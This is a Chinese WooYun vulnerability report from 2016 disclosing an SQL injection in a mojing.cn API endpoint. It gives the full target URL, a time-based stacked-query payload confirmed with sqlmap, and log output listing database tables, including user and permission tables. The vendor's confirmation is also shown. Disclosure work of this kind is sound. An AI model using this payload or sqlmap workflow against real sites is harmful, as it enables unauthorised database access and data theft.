漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0211580
漏洞标题:暴风墨镜某站存在sql注入/59张表/权限控制数据库
相关厂商:mojing.cn
漏洞作者: hear7v
提交时间:2016-05-22 08:45
修复时间:2016-07-07 12:00
公开时间:2016-07-07 12:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-05-22: 细节已通知厂商并且等待厂商处理中
2016-05-23: 厂商已经确认,细节仅向厂商公开
2016-06-02: 细节向核心白帽子及相关领域专家公开
2016-06-12: 细节向普通白帽子公开
2016-06-22: 细节向实习白帽子公开
2016-07-07: 细节向公众公开
简要描述:
本来打算这几天来一波女性专题的,结果晚上来了这个洞
详细说明:
http://mj.cms.mojing.cn/api/v1/scene/video/testing.php?mobile_brand=Xiaomi&mobile_model=MI%204LTE&image_result=1&sound_result=1&telecom_operator=3&cpu_instruction_model=ARMv7%20Processor%20rev%201%20(v7l)&cpu_hardware_model=Qualcomm%20MSM8974PRO-AC
应该是app的api接口,抓包截获的流量,带上ua sqlmap,栈查询注入,
点信息
---
Parameter: cpu_hardware_model (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: mobile_brand=Xiaomi&mobile_model=MI 4LTE&image_result=1&sound_result=1&telecom_operator=3&cpu_instruction_model=ARMv7 Processor rev 1 (v7l)&cpu_hardware_model=Qualcomm MSM8974PRO-AC');(SELECT * FROM (SELECT(SLEEP(5)))szhG)#
---
漏洞证明:
23:52] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[01:26:47] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
[01:26:47] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[01:26:55] [INFO] adjusting time delay to 2 seconds due to good response times
[01:26:57] [ERROR] invalid character detected. retrying..
[01:26:57] [WARNING] increasing time delay to 3 seconds
59
[01:27:22] [ERROR] invalid character detected. retrying..
[01:27:23] [WARNING] increasing time delay to 4 seconds
[01:27:23] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
acl_menu_url
[01:31:14] [INFO] retrieved: acl_permissions
[01:34:51] [INFO] retrieved: acl_resources
[01:37:40] [INFO] retrieved: acl_roles
[01:39:17] [INFO] retrieved: acl_user_to_role
[01:43:24] [INFO] retrieved: acl_users
[01:44:16] [INFO] retrieved: android_ba
修复方案:
过滤,厂商好冷,能送礼物么
版权声明:转载请注明来源 hear7v@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2016-05-23 11:54
厂商回复:
感谢您提交的漏洞,我们会尽快修复。
最新状态:
暂无